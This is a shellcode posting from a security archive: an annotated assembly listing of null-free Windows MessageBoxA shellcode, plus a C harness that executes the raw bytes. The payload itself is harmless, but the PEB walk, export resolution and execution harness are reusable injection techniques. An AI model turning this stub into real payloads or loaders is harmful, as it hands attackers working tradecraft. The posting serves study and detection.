
All Windows Null-Free MessageBoxA Shellcode

All Windows Null-Free MessageBoxA Shellcode
Posted Jul 12, 2011
Authored by AutoSec Tools | Site autosectools.com

A 167-byte null-free MessageBoxA shellcode for all Windows versions. Tested on 2000, XP, XP x64, Vista, 7, and 8 M3 x64.

tags | shellcode
systems | windows
MD5 | dfa35acf94a6226ccd3a9e44c48db966

/*

;------------------------------------------------------------------------
;Title...................All Windows Null-free MessageBoxA Shellcode
;........................167 Bytes
;Release Date............7/11/2011
;Tested On...............Windows 2000, Windows XP, Windows XP x64,
;........................Windows Vista, Windows 7, Windows 8 M3 x64
;------------------------------------------------------------------------
;Author..................John Leitch
;Site....................http://www.autosectools.com/
;Email...................john@autosectools.com
;------------------------------------------------------------------------

bits 32

; Register conventions for the whole listing (NASM, Intel syntax, 32-bit):
;   ebx = 0 from here on. It is used as the zero register and as the four NULL
;         MessageBoxA arguments, so no 0x00 byte needs to be encoded.
;   eax = kernel32 base inside find_function, resolved address on return.
xor ebx, ebx

; Code comes first, the entry point last: the backward call from start to
; find_function encodes as a negative rel32 (e8 9c ff ff ff), which is null-free.
jmp short start

;================================
;Find Function
;================================
; Resolves a kernel32 export by name prefix.
; In:   [esp+0x4] = first 4 bytes of the name, [esp+0x8] = next 4 bytes
;       (pushed by the caller), ebx = 0
; Out:  eax = virtual address of the export
; Clob: ecx, edx, esi, edi, ebp, flags
; Only those 8 bytes are compared, so the first export in name-table order
; that starts with the prefix wins ("LoadLibr", "GetProcA").
; The two pushed dwords are NOT removed by ret; the caller discards them.
; Detection note: the fs:[0x30] -> +0x0c -> +0x1c walk followed by a manual
; export-table scan is the classic position-independent API-resolution pattern
; that memory scanners and YARA rules key on.
find_function:

;================================
;Find Kernel32 Base
;================================
mov edi, [fs:ebx+0x30]          ; fs:[0x30] = PEB. ebx (=0) as base gives a 1-byte
                                ; displacement; [fs:0x30] alone would need a 4-byte
                                ; displacement containing 0x00 bytes
mov edi, [edi+0x0c]             ; PEB->Ldr (PEB_LDR_DATA)
mov edi, [edi+0x1c]             ; Ldr->InInitializationOrderModuleList.Flink

module_loop:
; edi = LIST_ENTRY inside an LDR_DATA_TABLE_ENTRY; offsets below are relative
; to that InInitializationOrder link, not to the start of the structure.
mov eax, [edi+0x08]             ; eax = DllBase of this module
mov esi, [edi+0x20]             ; esi = BaseDllName.Buffer (UTF-16)
mov edi, [edi]                  ; advance to the next entry (Flink)

; Byte 0x0C of the UTF-16 name is the 7th character: "KERNEL32" has '3' there.
; Scanning for that character rather than taking a fixed list position is what
; makes this work across versions where the 3rd initialized module differs.
; NOTE(review): there is no end-of-list check; the list is circular, so if no
; module's 7th character is '3' this loop never terminates.
cmp byte [esi+0x0C], '3'
jne module_loop

;================================
;Kernel32 PE Header
;================================
mov edi, eax
add edi, [eax+0x3c]             ; edi = base + e_lfanew = IMAGE_NT_HEADERS

;================================
; Export directory table
;================================
;0x00 Export Flags
;0x04 Time/Date Stamp
;0x08 Major Version
;0x0A Minor Version
;0x0C Name RVA
;0x10 Ordinal Base
;0x14 Address Table Entries
;0x18 Number Of Names
;0x1c Address Table RVA
;0x20 Name Pointer Table RVA
;0x24 Ordinal Table RVA
;================================

;================================
;Kernel32 Export Directory Table
;================================
mov edx, [edi+0x78]             ; DataDirectory[EXPORT].VirtualAddress (32-bit PE: NT headers + 0x78)
add edx, eax                    ; edx = export directory VA (RVA + base)

;================================
;Kernel32 Name Pointers
;================================
mov edi, [edx+0x20]             ; Name Pointer Table RVA (0x20 in the table above)
add edi, eax                    ; edi = &names[0] (array of RVAs)

;================================
;Find LoadLibraryA
;================================
; Walks the (alphabetically sorted) name table until the 8-byte prefix the
; caller pushed matches. ebp is the index into the name pointer table.
mov ebp, ebx                    ; ebp = 0
name_loop:
mov esi, [edi+ebp*0x4]          ; esi = names[ebp] (RVA)
add esi, eax                    ; esi = VA of the ASCII export name
inc ebp                         ; ebp is now index + 1 (matters for the ordinal lookup below)
mov ecx, [esp+0x4]              ; first 4 bytes of the wanted name (from the caller's push)
cmp dword [esi], ecx
jne name_loop
mov ecx, [esp+0x8]              ; next 4 bytes
cmp dword [esi+0x4], ecx
jne name_loop                   ; NOTE(review): never bounded by Number Of Names (+0x18);
                                ; an absent name walks off the end of the table

;================================
;LoadLibraryA Ordinal
;================================
mov edi, [edx+0x24]             ; Ordinal Table RVA
add edi, eax                    ; edi = &ordinals[0] (16-bit, already unbiased = address-table index)
mov bp, [edi+ebp*0x2]           ; 16-bit write: the upper half of ebp keeps the counter's upper
                                ; half, which is 0 for any realistic table size.
                                ; NOTE(review): ebp is matched index + 1 here, so this loads the
                                ; ordinal of the entry AFTER the match; combined with the -1 below
                                ; it resolves the right function only when ordinals are assigned
                                ; consecutively in name order (true for the kernel32 builds listed
                                ; as tested) — verify before relying on it elsewhere.

;================================
;LoadLibraryA Address
;================================
mov edi, [edx+0x1C]             ; Address Table RVA
add edi, eax                    ; edi = &addresses[0] (array of RVAs)
mov edi, [edi+(ebp-0x1)*0x4] ;addresses[ebp-1] (RVA). The ordinal table is unbiased, so this
                             ;-1 is not an ordinal-base correction; see the note above
add eax, edi                    ; eax = base + RVA = VA of the export
ret                             ; the two name dwords stay on the stack (no 'ret 8')

start:

;================================
;Call LoadLibraryA
;================================
; Stack after the two pushes reads "LoadLibr" — the 8-byte prefix find_function compares.
push 0x7262694C ;Libr
push 0x64616F4C ;Load
call find_function              ; eax = LoadLibraryA

; Build "user32\0\0" on the stack. The terminating NULs come from the register
; zeroing at run time so they never appear in the encoded bytes.
xor ecx, ecx
mov cx, 0x3233 ;32               ; ecx = "32\0\0"
push ecx

push 0x72657375 ;user            ; stack now holds "user32\0\0"

push esp ; lpFileName            ; pointer to the string just built

call eax                         ; LoadLibraryA("user32"); stdcall, pops its one argument
push eax                         ; keep hUser32 beneath the next find_function arguments

;================================
;Call GetProcAddress
;================================
push 0x41636F72 ;rocA
push 0x50746547 ;GetP            ; prefix "GetProcA"
call find_function               ; eax = GetProcAddress

pop ecx                          ; discard "GetP"
pop ecx                          ; discard "rocA"
pop ecx                          ; ecx = hUser32 saved above

; Build "MessageBoxA\0". The constant 0x041786F0 holds no 0x00 byte; the shift
; yields 0x0041786F = "oxA\0", producing the NUL terminator in place.
push 0x041786F0; oxA
shr dword [esp], 0x4
push 0x42656761; ageB
push 0x7373654D; Mess

push esp ; lpProcName            ; pointer to "MessageBoxA"
push ecx ; hModule               ; hUser32

call eax                         ; GetProcAddress(hUser32, "MessageBoxA"); stdcall, pops both

;================================
;Call MessageBoxA
;================================
; Arguments pushed right to left, all zero (ebx): uType=0 (MB_OK), lpCaption=NULL,
; lpText=NULL, hWnd=NULL.
push ebx
push ebx
push ebx
push ebx
call eax                         ; MessageBoxA(NULL, NULL, NULL, MB_OK)
                                 ; NOTE(review): nothing follows this call (no ret and no
                                 ; ExitProcess), so once the box is closed execution continues
                                 ; into whatever bytes sit after the payload.

*/

#include <stdio.h>
#include <string.h>
#include <windows.h>

using namespace std;

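/*
 * Test harness: copies the payload from the listing above into a fresh page
 * and jumps to it.
 *
 * Changes from the original harness:
 *   - the length is taken from sizeof() instead of strlen(), so it no longer
 *     depends on the payload being NUL-free;
 *   - the allocation is checked, mapped read/write for the copy and only then
 *     switched to read/execute, so the region is never writable and
 *     executable at the same time;
 *   - the printf format matches the argument type (the original passed a
 *     size_t to %i, which is undefined behaviour).
 *
 * Returns 0 on success, 1 if the page could not be allocated or protected.
 */
int main()
{
    /* The 167 bytes of the listing, reproduced byte-for-byte. */
    static const char shellcode[] =
    "\x31\xdb\xeb\x55\x64\x8b\x7b\x30"
    "\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47"
    "\x08\x8b\x77\x20\x8b\x3f\x80\x7e"
    "\x0c\x33\x75\xf2\x89\xc7\x03\x78"
    "\x3c\x8b\x57\x78\x01\xc2\x8b\x7a"
    "\x20\x01\xc7\x89\xdd\x8b\x34\xaf"
    "\x01\xc6\x45\x8b\x4c\x24\x04\x39"
    "\x0e\x75\xf2\x8b\x4c\x24\x08\x39"
    "\x4e\x04\x75\xe9\x8b\x7a\x24\x01"
    "\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c"
    "\x01\xc7\x8b\x7c\xaf\xfc\x01\xf8"
    "\xc3\x68\x4c\x69\x62\x72\x68\x4c"
    "\x6f\x61\x64\xe8\x9c\xff\xff\xff"
    "\x31\xc9\x66\xb9\x33\x32\x51\x68"
    "\x75\x73\x65\x72\x54\xff\xd0\x50"
    "\x68\x72\x6f\x63\x41\x68\x47\x65"
    "\x74\x50\xe8\x7d\xff\xff\xff\x59"
    "\x59\x59\x68\xf0\x86\x17\x04\xc1"
    "\x2c\x24\x04\x68\x61\x67\x65\x42"
    "\x68\x4d\x65\x73\x73\x54\x51\xff"
    "\xd0\x53\x53\x53\x53\xff\xd0";

    /* sizeof() counts the implicit string terminator; drop it. */
    const size_t length = sizeof(shellcode) - 1;
    const SIZE_T regionSize = 4096;

    printf("shellcode length: %lu", (unsigned long)length);
    /* The payload does not return to us (see the note at the end of the
       listing), so make sure the message is out before control leaves. */
    fflush(stdout);

    /* Reserve and commit a read/write page for the copy. */
    LPVOID lpAlloc = VirtualAlloc(NULL, regionSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (lpAlloc == NULL) {
        fprintf(stderr, "VirtualAlloc failed: %lu\n", (unsigned long)GetLastError());
        return 1;
    }
    memcpy(lpAlloc, shellcode, length);

    /* Flip the page to read/execute before running it (W^X). The payload
       only writes to the stack, never to its own bytes, so RX is sufficient. */
    DWORD oldProtect = 0;
    if (!VirtualProtect(lpAlloc, regionSize, PAGE_EXECUTE_READ, &oldProtect)) {
        fprintf(stderr, "VirtualProtect failed: %lu\n", (unsigned long)GetLastError());
        VirtualFree(lpAlloc, 0, MEM_RELEASE);
        return 1;
    }
    FlushInstructionCache(GetCurrentProcess(), lpAlloc, length);

    /* NOTE(review): the listing ends in `call eax` with no ret, so after the
       message box is closed execution runs into the zero-filled remainder of
       the page rather than returning here; the cleanup below is only reached
       if the payload is changed to return. */
    ((void(*)())lpAlloc)();

    VirtualFree(lpAlloc, 0, MEM_RELEASE);
    return 0;
}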